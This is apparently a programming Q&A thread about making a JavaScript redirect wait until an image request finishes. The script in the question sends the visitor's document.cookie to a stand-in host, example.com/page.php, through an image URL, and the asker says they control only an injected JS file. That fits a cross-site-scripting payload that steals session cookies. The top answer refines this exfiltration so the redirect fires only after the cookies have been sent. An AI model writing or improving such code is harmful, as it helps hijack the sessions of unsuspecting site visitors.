# redirect after document.write is completed

Tags: javascript

I'm trying to make sure my script redirects to *home.example.com* only after a request has been made to page.php with the user's cookies. I'm aware that my code is broken (As I've taken the assumption that the first request will always take less than 20 seconds to complete). Is there any way to make sure the script only redirects after the request to page.php has completed?

```
document.write('<img src="https://example.com/page.php?data=' + document.cookie + '" />');

window.setTimeout(function() {
location.href = "http://home.example.com"
}, 20000);
```

Any help is appreciated, sorry for the nooby question.

Comment: Use the `load` event on the image.

Comment: @SLaks - that would be the `onload` *attribute* in this case :p

Comment: Also, don't use `document.write()`.

Answer (score 2):

```js
document.write('<img id="img" />');

var imgNode = document.querySelector("#img");
    
imgNode.addEventListener("load", function () {
    location.href = "http://home.example.com";
});
    
imgNode.src = "https://example.com/page.php?data=" + document.cookie;
```

Comment: Hi, I'm unable to make changes to the HTML page running this script. I can only control the js file itself. I got the following error when running this script on the page **Uncaught TypeError: Cannot read property 'addEventListener' of null**

Comment: The redirect fails to occur because of the following error **Failed to execute 'write' on 'Document': It isn't possible to write into a document from an asynchronously-loaded external script unless it is explicitly opened.**, Thank you very much for already helping a lot! I'm figuring it out along with you, if nothing works I'll go with the 20 second wait approach.

Answer (score 0):

You should use header" ( "refresh:20;url=wherever.php" ); ",Before document.write is use.
You can refer:-"stackoverflow.com/questions/6119451/page-redirect-after-certain-time-php"